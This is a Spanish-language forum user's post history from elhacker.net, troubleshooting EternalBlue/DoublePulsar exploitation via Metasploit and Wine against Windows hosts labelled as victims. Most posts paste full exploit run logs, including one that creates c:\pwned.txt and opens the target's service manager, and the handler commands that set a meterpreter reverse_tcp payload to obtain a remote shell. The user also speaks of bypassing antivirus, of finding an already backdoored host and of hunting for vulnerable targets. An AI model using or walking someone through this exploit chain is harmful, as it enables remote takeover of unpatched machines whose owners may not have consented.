elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 12 Septiembre 2018, 08:40 am
por los procesos si ves algun ps raro lo matas CTRL +ALT +SUPR+ENTER o por regedit en la carpeta run o por el command netstat para ver si ves algun puerto abierto que no te convenza
2  Seguridad Informática / Bugs y Exploits / Re: problema con wine32 en: 12 Septiembre 2018, 08:32 am
que bueno me alegra que te funcione el exploit ami no me funciona ni creando mi proyecto desactivando el AV y el firewall...
si me funciona creando un payload windows/meterpreter/reverse_tcp me llega la conexion desactivando av y con firewall activo lo que si que el exploit no me funciona me aparece el error como publique sigo investigando asta me olvido de bañarme xD
3  Seguridad Informática / Bugs y Exploits / Re: problema con wine32 en: 12 Septiembre 2018, 05:57 am
no asta el dia de hoy sigo investigando desintale y volvi a instalarlo mil vece xD seguro es un bug por que leei que decian que con 32bits con soporte wine 32 bits fallaba instale 64 bits con wine con soporte de 32 bits y sigue igual xD encima me anda lento por que mi pc es vieja y ya deje con 64 bits
4  Seguridad Informática / Bugs y Exploits / Re: auditando en windows pero no me llega la session meterpreter en: 12 Septiembre 2018, 04:46 am
hola UNDER gracias por responderme y por decirme paso por paso las pauta que tuve que ir haciendo soy novato en esto y me falta por aprender ya me dedique alos pasos que me dijiste poreso tarde en responderte y aca estoy devuelta ya probe paso por paso como me ivas indicando....
creando un payload en un windows 7 y dio conecion pero tuve que desactivar el AV y no el FIREWALL
el exploit lo probe y el problema es que lo alertaba el AV asi que ahora tengo que investigar para bypass el AV y otro problema el exploit lo probe desactivando el AV y el FIREWALL y no conecta sigue apareciendo el error con wine como publike un post problema con wine pero bueno igual voy a intentar para la proxima cuando tenga un target vulnerable ir investigando por otras puertas no quedarme tildado en ese puerto nomas ...
igual tuve que cerrar el puerto  por hay alguien mas astuto que yo bypass mi AV y se filtra en mi sistema




5  Seguridad Informática / Bugs y Exploits / Re: auditando en windows pero no me llega la session meterpreter en: 1 Septiembre 2018, 00:00 am
hola gracias por responderme si ya me fije el codigo del exploit lo modifique esta parte

OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',30]), <-- tenia 60 lo baje a 30 de tiempo pero ahora me aparece este error nose si sera el exploit o viene el problema de wine

exploit

  • Started reverse TCP handler on :4444
  • :445 - Generating Eternalblue XML data
  • :445 - Generating Doublepulsar XML data
  • :445 - Generating payload DLL for Doublepulsar
  • :445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • 445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
0014:err:service:process_send_command receiving command result timed out
002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
0014:err:service:process_send_command receiving command result timed out
002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
  • :445 - Backdoor is already installed
  • :445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
  • :445 - Remote code executed... 3... 2... 1...
  • Exploit completed, but no session was created.


ves ya nose que hacer no entiendo sera mi conexion estoy conectado por un router wifi no tengo mucha señal que digamos o sera problema de wine
6  Seguridad Informática / Bugs y Exploits / Re: auditando en windows pero no me llega la session meterpreter en: 31 Agosto 2018, 00:14 am
hola ya probe y nada encima tengo otro para auditar pero tampoco me llega la conexion meterpreter


+] IP:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 <---ES VULNERABLE
[!] IP:445     - Host is likely INFECTED  - Arch: x86 (32-bit), XOR Key: <--- EL BACKDOOR FUE FILTRADO  Y ES WINDOWS 32 BITS use payload windows/meterpreter/reverse_tcp
 0x5E367352

> exploit

  • Started reverse TCP handler on IPLOCAL:4444
  • IP:445 - Generating Eternalblue XML data
  • IP:445 - Generating Doublepulsar XML data
  • IP:445 - Generating payload DLL for Doublepulsar
  • IP:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • IP:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out <-----SERA ESO EL PROBLEMA?
  • IP:445 - Backdoor is already installed
  • IP:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out<---- SERA ESO EL PROBLEMA?
  • IP:445 - Remote code executed... 3... 2... 1...
  • Exploit completed, but no session was created. <-----PERO NO ME LLEGA LA CONEXION METERPRETER

sera esto el problema 000f:err:service:process_send_command receiving command result timed out
poreso no me llega la conexion ya intente de mucha forma y nada hace 1 mes ando investigando y nose por que es
7  Seguridad Informática / Bugs y Exploits / auditando en windows pero no me llega la session meterpreter en: 23 Agosto 2018, 09:22 am
hola queria saber por que no me llega la conexion meterpreter estoy auditando un sistema windows crea el file txt osea es vulnerable pero no me llega la session meterpreter algunos saven por que es?

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017afe0098
InParam: 0xffffc00179f1216c
MID: 0x1403
unexpected alignment, diff: 0x10cd098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df92098
InParam: 0xffffc0017afe616c
MID: 0x1503
unexpected alignment, diff: 0x2fab098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df9e098
InParam: 0xffffc0017df9816c
MID: 0x1503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target <----------------VES QUE SE CREA OSEA ES VULNERABLE!!
Done

hay se creo el payload pero no me llega  la conexion al meterpreter sigue igual

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e2e6098
InParam: 0xffffc0017e19b16c
MID: 0x2c03
unexpected alignment, diff: 0x14a098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e376098
InParam: 0xffffc0017e2f616c
MID: 0x2d03
unexpected alignment, diff: 0x7f098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017ee5f098
InParam: 0xffffc0017e37c16c
MID: 0x2d03
unexpected alignment, diff: 0xae2098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017eef4098
InParam: 0xffffc0017eeee16c
MID: 0x2d03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on IPVICTIMA..... <------hay ME APARECIO LA IP PERO NO CONECTA
Creating service zRZy.....
Starting service zRZy.....
The NETBIOS connection with the remote host timed out.
Removing service zRZy.....
ServiceExec Error on: IPVICTIMA
nca_s_proto_error
Done


y esta es mi conexion en metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST MI IP LOCAL
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on MI IP LOCAL:4444


alguna ayuda porfavor!!



8  Seguridad Informática / Bugs y Exploits / problema con wine32 en: 21 Agosto 2018, 05:04 am
buenas nose si esto esta bien publicarlo en este lugar les queria comentar que tengo sistema vulnerables con el puerto 445 pero no me conecta y al scannear son vulnerables pero cuando configuro todo bien en metasploit me aparece esto ya intente muchas veces desintalar y volver a instalar wine pero sigue igual el error alguno que le aya pasado lo mismo con wine32

msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

  • Started reverse TCP handler on MIIPLOCAL:4444
  • IPVICTIMA:445 - Generating Eternalblue XML data
  • IPVICTIMA:445 - Generating Doublepulsar XML data
  • IPVICTIMA:445 - Generating payload DLL for Doublepulsar
  • IPVICTIMA:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • IPVICTIMA:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines